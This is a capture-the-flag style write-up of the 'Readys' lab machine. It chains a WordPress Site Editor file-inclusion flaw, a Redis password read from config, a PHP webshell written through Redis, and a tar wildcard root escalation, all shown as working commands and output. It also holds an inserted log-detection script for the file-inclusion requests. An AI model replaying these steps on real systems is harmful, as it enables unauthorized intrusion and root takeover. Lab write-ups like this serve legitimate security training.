Machine Information
- Machine Name: Readys
- Machine Difficulty: intermediate
Information Gathering
Classic nmap time
Nmap scan report for 192.168.185.166
Host is up, received user-set (0.017s latency).
Scanned at 2024-10-27 11:46:13 +08 for 46s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGGcX/x/M6J7Y0V8EeUt0FqceuxieEOe2fUH2RsY3XiSxByQWNQi+XSrFElrfjdR2sgnauIWWhWibfD+kTmSP5gkFcaoSsLtgfMP/2G8yuxPSev+9o1N18gZchJneakItNTaz1ltG1W//qJPZDHmkDneyv798f9ZdXBzidtR5/+2ArZd64bldUxx0irH0lNcf+ICuVlhOZyXGvSx/ceMCRozZrW2JQU+WLvs49gC78zZgvN+wrAZ/3s8gKPOIPobN3ObVSkZ+zngt0Xg/Zl11LLAbyWX7TupAt6lTYOvCSwNVZURyB1dDdjlMAXqT/Ncr4LbP+tvsiI1BKlqxx4I2r
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCpAb2jUKovAahxmPX9l95Pq9YWgXfIgDJw0obIpOjOkdP3b0ukm/mrTNgX2lg1mQBMlS3lzmQmxeyHGg9+xuJA=
| 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE0omUJRIaMtPNYa4CKBC+XUzVyZsJ1QwsksjpA/6Ml+
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.7.2
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Readys – Just another WordPress site
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
6379/tcp open redis syn-ack ttl 61 Redis key-value store
I usually start with the web port.
Port 80
According to nmap, it's a WordPress site. I then used wpscan to get some juicy information.
wpscan --url http://192.168.185.166/ -e p
...
[i] Plugin(s) Identified:
[+] site-editor
| Location: http://192.168.185.166/wp-content/plugins/site-editor/
| Latest Version: 1.1.1 (up to date)
| Last Updated: 2017-05-02T23:34:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.1.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.185.166/wp-content/plugins/site-editor/readme.txt
...
I found a plugin installed in WordPress. I then checked whether this plugin has any existing exploit.
searchsploit wordpress plugin site editor
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Site Editor 1.1.1 - Local File Inclusion | php/webapps/44340.txt
WordPress Plugin User Role Editor 3.12 - Cross-Site Request Forgery | php/webapps/25721.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
According to the result, the plugin is vulnerable to local file inclusion. I then tried to replicate it and see how it works.
curl 'http://192.168.185.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
redis:x:107:114::/var/lib/redis:/usr/sbin/nologin
alice:x:1000:1000::/home/alice:/bin/bash
{"success":true,"data":{"output":[]}}
Since I have LFI, I looked into some interesting files and found some useful information.
curl -s 'http://192.168.185.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/redis/redis.conf' | grep -v '#' | grep pass
requirepass Ready4Redis?
I found a password in /etc/redis/redis.conf. I then realized it's time to check the Redis port.
Port 6379
redis-cli -h 192.168.185.166
192.168.185.166:6379> info
NOAUTH Authentication required.
192.168.185.166:6379> auth Ready4Redis?
OK
192.168.185.166:6379> info
# Server
redis_version:5.0.14
...
After playing around with Redis, I managed to log in with the credential and get the Redis version. I then explored Redis's functionality. According to this, I could try to write malicious PHP code onto the filesystem and achieve RCE from the web.
192.168.185.166:6379> config set dir /var/www/html
OK
192.168.185.166:6379> config set dbfilename test.php
OK
192.168.185.166:6379> set test "<?php phpinfo(); ?>"
OK
192.168.185.166:6379> save
(error) ERR
I tried /var/www/html first, as that's the default location for most web directories. Since I have a local file inclusion vulnerability, I could save the file anywhere and use the vulnerability to include my PHP file.
192.168.185.166:6379> config set dir /dev/shm
OK
192.168.185.166:6379> config set dbfilename test.php
OK
192.168.185.166:6379> set test "<?php system($_GET[0]); ?>"
OK
192.168.185.166:6379> save
OK
Now that I have saved the file into the /dev/shm directory, I try to access it using the LFI that I have.
curl -s 'http://192.168.185.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/dev/shm/test.php&0=id' --output -
REDIS0009 redis-ver5.0.14
redis-bits@ctimeused-mem
aof-preambletestuid=1000(alice) gid=1000(alice) groups=1000(alice)
DN($+{"success":true,"data":{"output":[]}}
Although the output is weird, I could still execute commands. Now that I have command execution, it's time to get a reverse shell.
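From the defender's side, both steps above (the plugin LFI and the Redis-written file being included with a command parameter) leave a clear trace in the web server's access log. The following detector is an added example, not part of the original writeup: it scans Apache combined-log lines for requests to the site-editor ajax_shortcode_pattern.php endpoint whose ajax_path is an absolute path or contains traversal, and reports any extra parameters such as the 0=id that accompanied the included file. The log entries and the function name detect_lfi are constructed for this example.

```shell
#!/bin/sh
# Constructed Apache access-log sample; the request paths mirror the ones in
# this writeup, but the log entries themselves are invented for the example.
SAMPLE_LOG='192.168.185.1 - - [27/Oct/2024:11:50:01 +0800] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 200 2034 "-" "curl/7.88.1"
192.168.185.1 - - [27/Oct/2024:11:51:12 +0800] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/redis/redis.conf HTTP/1.1" 200 61828 "-" "curl/7.88.1"
192.168.185.1 - - [27/Oct/2024:12:02:40 +0800] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/dev/shm/test.php&0=id HTTP/1.1" 200 311 "-" "curl/7.88.1"
192.168.185.1 - - [27/Oct/2024:12:03:05 +0800] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
192.168.185.1 - - [27/Oct/2024:12:03:30 +0800] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 65 "-" "Mozilla/5.0"'

# Print one line per suspicious request: client, timestamp, the ajax_path
# value, and any other query parameters that rode along with it.
# In the combined log format $7 is the request path, $4 the timestamp.
detect_lfi() {
    printf '%s\n' "$SAMPLE_LOG" | awk '
        $7 ~ /ajax_shortcode_pattern\.php[?]/ {
            split($7, url, "?"); n = split(url[2], kv, "&")
            val = ""; extra = ""
            for (i = 1; i <= n; i++) {
                if (kv[i] ~ /^ajax_path=/) val = substr(kv[i], 11)
                else extra = extra (extra == "" ? "" : ",") kv[i]
            }
            # absolute path, raw traversal, or URL-encoded ".." / "/"
            if (val ~ /^\// || val ~ /\.\./ || tolower(val) ~ /%2e%2e|%2f/)
                print $1, $4, "ajax_path=" val, (extra == "" ? "-" : "extra=" extra)
        }'
}

detect_lfi
```

Four of the five sample lines are reported; the heartbeat request to admin-ajax.php is not, and the /dev/shm hit carries extra=0=id, which is the command parameter from the chain above.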
nc -nvlp 1234
alice@readys:/var/www/html/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes$ whoami
alice
Now that I have a shell but not root, it's time for privilege escalation.
Privilege Escalation
I usually start by running linpeas.sh since this is a Linux machine.
alice@readys:/etc$ cat crontab
*/3 * * * * root /usr/local/bin/backup.sh
alice@readys:/etc$ cat /usr/local/bin/backup.sh
#!/bin/bash
cd /var/www/html
if [ $(find . -type f -mmin -3 | wc -l) -gt 0 ]; then
tar -cf /opt/backups/website.tar *
fi
It seems like another tar privilege escalation. According to this, it is possible to get another shell with the help of --checkpoint=1 and --checkpoint-action=exec=/bin/sh. Since there's a wildcard, *, in the tar command, I could just provide the arguments as filenames.
alice@readys:/var/www/html$ echo '' > --checkpoint=1
alice@readys:/var/www/html$ echo '' > '--checkpoint-action=exec=bash test.sh'
alice@readys:/var/www/html$ vim test.sh
alice@readys:/var/www/html$ cat test.sh
chmod +s /bin/bash
I added the required arguments as filenames in /var/www/html because the script changes into that directory before running the tar command. As for test.sh, I used it to execute a command to make sure it works. After waiting for a while, /bin/bash had the SUID bit set, which means I could just get a root shell now.
alice@readys:/var/www/html$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
alice@readys:/var/www/html$ /bin/bash -p
bash-5.0# whoami
root
Things I learned from this machine
- LFI to RCE with the help of Redis
- Redis can write files to certain places
- check the Redis config file to get the Redis password
- tar wildcard privesc